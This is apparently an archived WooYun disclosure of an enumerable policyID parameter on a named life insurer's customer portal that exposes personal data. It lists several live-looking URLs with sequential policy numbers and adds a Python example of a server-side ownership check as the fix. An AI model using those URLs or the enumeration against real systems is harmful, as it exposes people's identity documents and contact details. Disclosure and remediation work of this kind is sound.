
PKU Founder Life Insurance: arbitrary enumeration of policy information (name, ID card number, mobile number, address, etc.)

2015-04-20 19:35

https://ebusiness.pkufi.com/Eservice/MyPolicyInfo.aspx?policyID=2300049772&ETPA=0



The policyID parameter can be enumerated.

[Screenshot: 2015-03-06 6.20.25 PM.png]



Code section:
http://ebusiness.pkufi.com/Eservice/MyPolicyInfo.aspx?policyID=2300049144&ETPA=0

http://ebusiness.pkufi.com/Eservice/MyPolicyInfo.aspx?policyID=2300049217&ETPA=0

http://ebusiness.pkufi.com/Eservice/MyPolicyInfo.aspx?policyID=2300049195&ETPA=0

http://ebusiness.pkufi.com/Eservice/MyPolicyInfo.aspx?policyID=2300049268&ETPA=0

http://ebusiness.pkufi.com/Eservice/MyPolicyInfo.aspx?policyID=2300049209&ETPA=0

http://ebusiness.pkufi.com/Eservice/MyPolicyInfo.aspx?policyID=2300049292&ETPA=0

http://ebusiness.pkufi.com/Eservice/MyPolicyInfo.aspx?policyID=2300049250&ETPA=0

Proof of vulnerability:

[Screenshot: 2015-03-06 6.21.43 PM.png]

[Screenshot: 2015-03-06 6.22.13 PM.png]

[Screenshot: 2015-03-06 6.22.21 PM.png]

Remediation:
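
An added example, not part of the original report or the vendor's code: a Python model of the server-side ownership check whose absence makes policyID enumerable, shown beside the behaviour the report describes. The in-memory store, the Session shape, the function names, the sample policy numbers and the denial threshold are all assumptions made for illustration.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample data: policy numbers and owners are invented for this example.
POLICIES = {
    "9000000001": {"owner": "cust-a", "holder": "Holder A"},
    "9000000002": {"owner": "cust-b", "holder": "Holder B"},
}
POLICY_ID_RE = re.compile(r"\d{10}")  # same 10-digit shape as the policyID values above
MAX_DENIALS = 3                       # assumed threshold before the session is blocked


@dataclass
class Session:
    customer_id: Optional[str] = None  # None means not logged in
    denials: int = 0                   # failed lookups seen in this session


def get_policy_vulnerable(session, policy_id):
    """Behaviour the report describes: any policyID returns its record."""
    record = POLICIES.get(policy_id)
    return (200, record) if record else (404, None)


def get_policy_hardened(session, policy_id):
    """Return the record only when it belongs to the logged-in customer."""
    if session.customer_id is None:
        return (401, None)
    if session.denials >= MAX_DENIALS:
        return (429, None)  # repeated misses in one session look like enumeration
    valid = POLICY_ID_RE.fullmatch(policy_id) is not None
    record = POLICIES.get(policy_id) if valid else None
    if record is None or record["owner"] != session.customer_id:
        session.denials += 1
        # Same answer for "missing" and "not yours": no existence oracle.
        return (404, None)
    return (200, record)
```

The hardened lookup takes the customer identity from the server-side session only; nothing in the request can widen the set of policies the caller may read.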

Source: www.wooyun.org/bugs/wooyun-2015-099917
